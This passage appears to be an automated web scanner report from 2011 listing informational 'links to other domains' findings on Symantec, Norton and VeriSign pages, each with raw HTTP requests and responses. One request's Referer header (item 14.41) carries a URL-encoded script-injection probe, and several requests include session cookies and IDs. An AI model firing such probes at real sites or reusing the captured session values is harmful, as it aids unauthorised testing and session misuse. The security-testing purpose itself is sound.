HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:38 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_earth_day Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_earth_day"> here</a>...[SNIP]...
14.31. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://shop.symantecstore.com
Path:
/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/
Issue detail
The page was loaded from a URL containing a query string:http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/?inid=us_hho_homepage_hero_mac2010lp The response contains the following link to another domain:http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_mac2010lp
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/?inid=us_hho_homepage_hero_mac2010lp HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:34 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_mac2010lp Content-Length: 282 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_mac2010lp"> here</a>...[SNIP]...
14.32. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://shop.symantecstore.com
Path:
/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/
Issue detail
The page was loaded from a URL containing a query string:http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/?inid=us_hhobanner_2year The response contains the following link to another domain:http://buy.norton.com/domain_migration?inid=us_hhobanner_2year
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/?inid=us_hhobanner_2year HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:35 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_2year Content-Length: 270 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_2year"> here</a>...[SNIP]...
14.33. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://shop.symantecstore.com
Path:
/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7
Issue detail
The page was loaded from a URL containing a query string:http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7?inid=us_hho_homepage_hero_windows7 The response contains the following link to another domain:http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_windows7
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7?inid=us_hho_homepage_hero_windows7 HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:35 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_windows7 Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_windows7"> here</a>...[SNIP]...
14.34. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://shop.symantecstore.com
Path:
/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/
Issue detail
The page was loaded from a URL containing a query string:http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/?inid=us_hho_homepage_hero_nisnavstore2010 The response contains the following link to another domain:http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnavstore2010
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/?inid=us_hho_homepage_hero_nisnavstore2010 HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:37 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnavstore2010 Content-Length: 288 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnavstore2010"> here</a>...[SNIP]...
14.35. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://shop.symantecstore.com
Path:
/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400
Issue detail
The page was loaded from a URL containing a query string:http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400?inid=us_hhobanner_nisnaveol The response contains the following link to another domain:http://buy.norton.com/domain_migration?inid=us_hhobanner_nisnaveol
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400?inid=us_hhobanner_nisnaveol HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:38 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_nisnaveol Content-Length: 274 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_nisnaveol"> here</a>...[SNIP]...
14.36. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://shop.symantecstore.com
Path:
/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/
Issue detail
The page was loaded from a URL containing a query string:http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/?inid=us_hho_homepage_hero_nisnustore2010 The response contains the following link to another domain:http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnustore2010
Request
GET /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/?inid=us_hho_homepage_hero_nisnustore2010 HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:36 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnustore2010 Content-Length: 287 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnustore2010"> here</a>...[SNIP]...
14.37. http://shop.symantecstore.com/store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://shop.symantecstore.com
Path:
/store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300
Issue detail
The page was loaded from a URL containing a query string:http://shop.symantecstore.com/store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300?inid=us_hhobanner_pc_powerboost_2008 The response contains the following link to another domain:http://buy.norton.com/domain_migration?inid=us_hhobanner_pc_powerboost_2008
Request
GET /store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300?inid=us_hhobanner_pc_powerboost_2008 HTTP/1.1 Host: shop.symantecstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Fri, 09 Sep 2011 21:46:40 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_pc_powerboost_2008 Content-Length: 283 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_pc_powerboost_2008"> here</a>...[SNIP]...
14.38. https://ssl-certificate-center.verisign.ch/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The page was loaded from a URL containing a query string:https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH The response contains the following links to other domains:https://ssl.google-analytics.com/urchin.js https://www.verisign.ch/repository/index.html https://www.verisign.ch/repository/legal-notices.html https://www.verisign.ch/repository/privacy.html https://www.verisign.ch/ssl/buy-ssl-certificates/index.html https://www.verisign.com/js/mbox.js
Request
GET /process/retail/console_login?application_locale=VRSN_CH HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:42 GMT Server: Apache Set-Cookie: TLTHID=34E1AEF0DB2D10DB645D8BD14E31479C; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"> </script>...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]... <p>To buy, renew or replace a certificate and get your VeriSign.. Trust Center sign-in, go to <a href="https://www.verisign.ch/ssl/buy-ssl-certificates/index.html" target="_blank"> Buy SSL Certificates >></a>...[SNIP]... <div class="inlineimg" style="padding-left:0px"><a target="_blank" href="https://www.verisign.ch/repository/legal-notices.html"> Legal Notices</a>...[SNIP]... <div class="inlineimg"><a target="_blank" href="https://www.verisign.ch/repository/privacy.html"> Privacy</a></div><div class="inline"><a target="_blank" href="https://www.verisign.ch/repository/index.html"> Repository</a>...[SNIP]...
14.39. https://ssl-certificate-center.verisign.com/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The page was loaded from a URL containing a query string:https://ssl-certificate-center.verisign.com/process/retail/console_login?application_locale=VRSN_US The response contains the following links to other domains:https://cert.webtrust.org/ViewSeal?id=304 https://ssl.google-analytics.com/urchin.js
Request
GET /process/retail/console_login?application_locale=VRSN_US HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:44 GMT Server: Apache Set-Cookie: TLTHID=3597AA5CDB2D10DB49F0B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 12293 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]... <div class="right"><a target="_blank" href="https://cert.webtrust.org/ViewSeal?id=304"> <img border="0" src="/rcm/verisign/images/webtrust.gif" style="border:0" title="WebTrust" alt="WebTrust">...[SNIP]...
14.40. http://store.symantec.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.symantec.com
Path:
/
Issue detail
The page was loaded from a URL containing a query string:http://store.symantec.com/?inid=us_pagenotfound_smb_store The response contains the following links to other domains:http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js http://ajax.aspnetcdn.com/ajax/jquery.ui/1.8.9/jquery-ui.min.js http://ajax.aspnetcdn.com/ajax/jquery.validate/1.7/jquery.validate.min.js http://ajax.microsoft.com/ajax/jquery.ui/1.8.9/themes/cupertino/jquery-ui.css
Request
GET /?inid=us_pagenotfound_smb_store HTTP/1.1 Host: store.symantec.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Fri, 09 Sep 2011 21:30:57 GMT Content-Length: 18197 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <!-- ...[SNIP]... <!-- Microsoft CDN Script References --> <script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js" type="text/javascript"> </script> <script src="http://ajax.aspnetcdn.com/ajax/jquery.validate/1.7/jquery.validate.min.js" type="text/javascript"> </script>...[SNIP]... <!-- Microsoft CDN CSS References --> <link href="http://ajax.microsoft.com/ajax/jquery.ui/1.8.9/themes/cupertino/jquery-ui.css" rel="stylesheet" type="text/css" /> <title>...[SNIP]... <!-- Microsoft CDN Script References --> <script src="http://ajax.aspnetcdn.com/ajax/jquery.ui/1.8.9/jquery-ui.min.js" type="text/javascript"> </script>...[SNIP]...
14.41. https://symantec-corporation.com/servlet/campaignrespondent
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://symantec-corporation.com
Path:
/servlet/campaignrespondent
Issue detail
The page was loaded from a URL containing a query string:https://symantec-corporation.com/servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004 The response contains the following links to other domains:https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp https://www-secure.symantec.com/about/profile/policies/legal.jsp https://www-secure.symantec.com/about/profile/policies/privacy.jsp https://www-secure.symantec.com/css/20081218/business.css https://www-secure.symantec.com/css/20090521/symantec.css https://www-secure.symantec.com/feedback/contactus.jsp https://www-secure.symantec.com/globalsites/index.jsp https://www-secure.symantec.com/images/masthead/symantec.gif https://www-secure.symantec.com/index.jsp https://www-secure.symantec.com/lib/jsp/headerutilsjs.jsp?lg=en&ct=us&sg=business&domain=&secure= https://www-secure.symantec.com/rss/index.jsp https://www-secure.symantec.com/script/20080114/swfobject.js https://www-secure.symantec.com/script/omniture/om_code.js https://www-secure.symantec.com/script/omniture/s_code.js https://www-secure.symantec.com/scripts/icrossing/i2a.js https://www-secure.symantec.com/sitemap/index.jsp https://www-secure.symantec.com/specprog/onlineopinionS3t/oo_engine.js
Request
GET /servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004 HTTP/1.1 Host: symantec-corporation.com Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:30 GMT P3P: policyref="http://policy.responsys.net/w3c/response.xml", CP="NON DSP COR IVAi IVDi OTRi IND ONL" Pragma: no-cache Cache-Control: no-cache, private Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 36800 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Symantec Enterprise Sales Contact Center</title> <meta content="veritasnonconsumer" name="om.environment"...[SNIP]... <meta content="en/us: biz: contactcenter: form" name="om.page_name" /> <link rel="stylesheet" href="https://www-secure.symantec.com/css/20090521/symantec.css" /> <link rel="stylesheet" href="https://www-secure.symantec.com/css/20081218/business.css" /> <script src="https://www-secure.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]... </script><script src="https://www-secure.symantec.com/specprog/onlineopinionS3t/oo_engine.js" language="javascript" type="text/javascript"> </script><script src="https://www-secure.symantec.com/script/20080114/swfobject.js" language="javascript" type="text/javascript"> </script><script src="https://www-secure.symantec.com/lib/jsp/headerutilsjs.jsp?lg=en&ct=us&sg=business&domain=&secure=" language="javascript" type="text/javascript"> </script>...[SNIP]... <!-- i2a tracking code--><script type="text/javascript" src="https://www-secure.symantec.com/scripts/icrossing/i2a.js"> </script>...[SNIP]... <div class="symLogo"><a href="https://www-secure.symantec.com/index.jsp"> <img title="Symantec Corporation | United States" alt="Symantec Corporation" src="https://www-secure.symantec.com/images/masthead/symantec.gif" /> </a>...[SNIP]... <span><a title="Site Map" href="https://www-secure.symantec.com/sitemap/index.jsp"> Site Map</a>...[SNIP]... <span><a title="Legal Notices" href="https://www-secure.symantec.com/about/profile/policies/legal.jsp"> Legal Notices</a>...[SNIP]... <span><a title="Privacy Policy" href="https://www-secure.symantec.com/about/profile/policies/privacy.jsp"> Privacy Policy</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a title="Contact Us" onMouseOver="showdiv(4)" onMouseOut="hidediv(4)" href="https://www-secure.symantec.com/feedback/contactus.jsp"> Contact Us</a>...[SNIP]... <span><a title="Global Sites" href="https://www-secure.symantec.com/globalsites/index.jsp"> Global Sites</a>...[SNIP]... <span><a title="License Agreements" href="https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp"> License Agreements</a>...[SNIP]... <span><a title="RSS" href="https://www-secure.symantec.com/rss/index.jsp"> RSS</a>...[SNIP]... </p> <script src="https://www-secure.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]...
14.42. https://trust-center.verisign.ch/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The page was loaded from a URL containing a query string:https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH The response contains the following links to other domains:https://ssl.google-analytics.com/urchin.js https://www.verisign.ch/repository/index.html https://www.verisign.ch/repository/legal-notices.html https://www.verisign.ch/repository/privacy.html https://www.verisign.ch/ssl/buy-ssl-certificates/index.html https://www.verisign.com/js/mbox.js
Request
GET /process/retail/console_login?application_locale=VRSN_CH HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:46 GMT Server: Apache Set-Cookie: TLTHID=371EA2F4DB2D10DB68CCA5440567C536; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11715 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"> </script>...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]... <p>To buy, renew or replace a certificate and get your VeriSign.. Trust Center sign-in, go to <a href="https://www.verisign.ch/ssl/buy-ssl-certificates/index.html" target="_blank"> Buy SSL Certificates >></a>...[SNIP]... <div class="inlineimg" style="padding-left:0px"><a target="_blank" href="https://www.verisign.ch/repository/legal-notices.html"> Legal Notices</a>...[SNIP]... <div class="inlineimg"><a target="_blank" href="https://www.verisign.ch/repository/privacy.html"> Privacy</a></div><div class="inline"><a target="_blank" href="https://www.verisign.ch/repository/index.html"> Repository</a>...[SNIP]...
14.43. https://trust-center.verisign.com/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The page was loaded from a URL containing a query string:https://trust-center.verisign.com/process/retail/console_login?application_locale=VRSN_US The response contains the following links to other domains:https://cert.webtrust.org/ViewSeal?id=304 https://ssl.google-analytics.com/urchin.js
Request
GET /process/retail/console_login?application_locale=VRSN_US HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:49 GMT Server: Apache Set-Cookie: TLTHID=38B3ED90DB2D10DB52A19F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 12062 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]... <div class="right"><a target="_blank" href="https://cert.webtrust.org/ViewSeal?id=304"> <img border="0" src="/rcm/verisign/images/webtrust.gif" style="border:0" title="WebTrust" alt="WebTrust">...[SNIP]...
14.44. https://trust-center.verisign.com/process/retail/trust_product_selector
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_product_selector
Issue detail
The page was loaded from a URL containing a query string:https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 The response contains the following links to other domains:https://cert.webtrust.org/ViewSeal?id=304 https://ssl.google-analytics.com/urchin.js
Request
GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 41019 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> ...[SNIP]... </script> <script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]... <div class="right"><a target="_blank" href="https://cert.webtrust.org/ViewSeal?id=304"> <img border="0" src="/rcm/verisign/images/webtrust.gif" style="border:0" title="WebTrust" 